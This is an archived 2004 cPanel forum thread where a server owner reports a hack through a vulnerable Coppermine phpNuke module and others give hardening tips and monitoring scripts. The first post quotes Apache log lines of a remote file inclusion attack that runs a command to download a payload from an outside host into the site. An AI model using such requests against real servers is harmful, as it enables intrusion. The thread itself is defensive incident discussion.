The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Hacked through coppermine (phpNuke Module)

Discussion in 'General Discussion' started by AbeFroman, Sep 14, 2004.

  1. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    How can I prevent hacks like these?

    root@server105 [/usr/local/apache/domlogs]# ll /home/cbo/public_html/themes/subBlack3dBlue/forums/images/lang_english/data.php
    -rw-r--r-- 1 cbo cbo 5156 Mar 4 2004 /home/cbo/public_html/themes/subBlack3dBlue/forums/images/lang_english/data.php
    root@server105 [/usr/local/apache/domlogs]# cat boxxxxx.net | grep wget
    203.130.255.177 - - [06/Sep/2004:03:28:16 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.deathwar.org/root.txt?&cmd=wget;id HTTP/1.1" 200 3347 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.52 [en]"
    203.130.255.177 - - [06/Sep/2004:03:28:21 -0500] "GET /favicon.ico HTTP/1.1" 404 3854 "http://www.boxxxxx.net/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.deathwar.org/root.txt?&cmd=wget;id" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.52 [en]"
    203.130.255.177 - - [06/Sep/2004:03:31:53 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.deathwar.org/root.txt?&cmd=cd%20../../../../themes/subBlack3dBlue/forums/images/lang_english;wget%20chanary.net/tools/olddriver%20-O%20data.php HTTP/1.1" 200 4809 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.52 [en]"
     
  2. haze

    haze Well-Known Member

    Joined:
    Dec 21, 2001
    Messages:
    1,550
    Likes Received:
    3
    Trophy Points:
    38
    There are many things that can be done to help prevent these sort of issues, here are just a few.

    1. Upgrade, or just don't use known vulnerable scripts.
    2. mod_security ( apache module )
    3. Strict permissions on files, folders and commonly known dumping grounds, such as /tmp
    4. Limit access to compilers ( just an aid )
    5. Limit available functions via php.ini
     
  3. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    Can you share a copy of your php.ini file here?
     
  4. drmike

    drmike Active Member

    Joined:
    Jul 8, 2004
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Charlotte, NC
  5. damainman

    damainman Well-Known Member

    Joined:
    Nov 13, 2003
    Messages:
    515
    Likes Received:
    0
    Trophy Points:
    16
    Did he actually hack your server, and what did he do ??
     
  6. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    He didnt get root access, he just uploaded egg drop.
     
  7. StevenC

    StevenC Well-Known Member

    Joined:
    Jan 1, 2004
    Messages:
    254
    Likes Received:
    0
    Trophy Points:
    16
    Typical script kiddie action. Again if you would use the damn search feature you would have known that.
     
  8. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    What do I search for "egg drop"?
     
  9. Ben

    Ben Well-Known Member

    Joined:
    Aug 19, 2002
    Messages:
    77
    Likes Received:
    0
    Trophy Points:
    6
    Damn guys, chill out.

    To the orginal poster, I'd reccomend mounting /tmp noexec and installing phpSuExec That'll make you a little more secure, hopefully enough to dissuade further attempts.
     
  10. cazny

    cazny BANNED

    Joined:
    Sep 3, 2004
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    0
    With your attitude I know not to do business with you
     
  11. haze

    haze Well-Known Member

    Joined:
    Dec 21, 2001
    Messages:
    1,550
    Likes Received:
    3
    Trophy Points:
    38
    Its common sense really, and im sure TLG can manage without your business.

    90% of the questions Abefroman ask, are already answered. This is NOT a forum to help you administrate your server. This forums purpose is to assist others and discuss cPanel related topics. With all these unmanaged server providers popping up, everyone and their dog think they can now run a hosting business. Its just not that easy, and if he wants help, he's going to have to learn how to help himself ( google.com ) and utilize the tools already provided for him rather than waste the space he takes up posting his nonsense.

    I think we can all have a say, perhaps we all don't see eye to eye, but its going to sink in some time.

    Abefroman, might I suggest you head over to http://www.webhostingtalk.com ( technical and security forums might be the best place to post ). Otherwise, please try and keep it to the newbie forums. Might help us hold on to what sanity we do have left :P :D
     
  12. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    There are installing it into a users directory and not /tmp

    I have phpSUexec.

    I have disabled dangerous php functions and removed the exploitable coppermine file.
     
  13. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    WHT sucks, I will continue to post here, I have made several helpful posts in threads that other people have started.
     
  14. DigiCrime

    DigiCrime Well-Known Member

    Joined:
    Nov 27, 2002
    Messages:
    399
    Likes Received:
    0
    Trophy Points:
    16
    chmod 750 /usr/bin/wget

    By simply chmod'ing the file so that no none-wheel or root user can use them we can eliminate many possible problems. The downside to doing this is that shell users will be inconvenienced by not being able to use the the commands below. Mod_security really removes the need to chmod this, but it is an added layer of protection.
     
  15. drmike

    drmike Active Member

    Joined:
    Jul 8, 2004
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Charlotte, NC
    Got to agree with that. The moderators act like god like being and, if you're one of their advertisers, you can get away with anything. I got banned for asked a host why they didn't honor their 30 day guantee when they keep posting about it. I posted politely about my account which I had closed out within 7 days after having a 41% uptime rating, they complained, away I went. Follow ups went unanswered and INet basicly told me that I should be kissing their rear for "providing such a rich environment" IIRC.

    -drmike
     
    #15 drmike, Sep 20, 2004
    Last edited: May 20, 2006
  16. hostit1

    hostit1 Well-Known Member

    Joined:
    Jul 24, 2003
    Messages:
    88
    Likes Received:
    0
    Trophy Points:
    0
    I would like to chime in a little

    I am NOT a security expert at all, but I wanted to share some thoughts on security. I owe the little knowledge that I do know to many generous posters here on the forum, employees and friends in the industry.

    I don't know if there is any such thing as a "Hack Proof" machine, but there are steps that you can take to help secure your system. Someone chimed in on many simple and important things in this post. Here are some ideas:

    1.) Limit php functions
    2.) Run /scripts/securetmp (Someone defaced EVERY index.htm* file on one of our servers a few years back because they were able to put a file and execute it from the tmp directory . . . we were ignorant)
    3.) Install a firewall and block everything except for needed ports. This is easy to do and will help.
    4.) Enable suexec. If you can't enable suexec, run a script that will email you process that are ran as nobody every few hours. This will only HELP detect hacks that are already present on the system that are running as nobody at the time the script is executed. Believe me, many of these scripts can run for hours, days, weeks . . .
    5.) jailshell your shell users and ONLY grant shell to people who need it. Monitor what your users are doing. If you think that someone is doing something wrong take a peek at their .bash_history (If they did not dlete it)
    6.) Run chkrootkit which again . . . will only HELP detect root kits. If you have a machine that is compromised, move your users off of the server to a 100% clean server.
    7.) For heavens sake, secure your root password and change it. Don't login directly via root (disable that feature if possible)
    8.) A script that will notify you when someone has logged in as root (don't rely on that 100%)
    9.) Save some money and hire an expert to "harden" your machines and give you pointers.
    10.) Install IDS and some type of application that will check checksum of "common hacked binary"
    11.) Keep your kernel and software up2date! Especially forum web apps and PHPNUKE!
    12.) BFD (Brute Force Detection). Parse or grep your /var/message log for things like invalid user and things like that. YOU ARE GOING TO FIND Brute Force Attempts if your computer is plugged into the Internet. Block ip addresses that do attempt to BF in to your box.
    13.) Security (Good security) is a full-time job. Hire a good security analyst


    A nice simple script to help detect process ran as nobody:
    *NOTE, some process such as perl/cgi httpd processes are normal. Its little processes such as .eggdrop and other suspicious process that are ran as nobody.

    #!/bin/bash
    function gethack {
    echo "===Run ls -alh /proc/(PID) to help find the root of the running process in question===="
    ps aux | grep nobody | grep -v apache | grep -v entropy | grep -v proftp | grep -v cpanel | grep -v grep
    echo "============"
    echo
    }
    gethack > hack_chk.txt
    mail youremailaddress@yourdomain.com -s "servername hack check report" < hack_chk.txt
    exit


    How to have a email sent when someone logs in as root:

    Edit the /root/.bash_profile using vi, nano, pico or some txt editing tool (ie pico /root/.bash_profile)

    Add the below to the bottom of the file:
    echo 'ALERT - Root Shell Access on:' `date` `who` | mail -s "Alert: Root Access on Server ip address 10.1.1.2" emailaddress@yourdomain.com
     
Loading...

Share This Page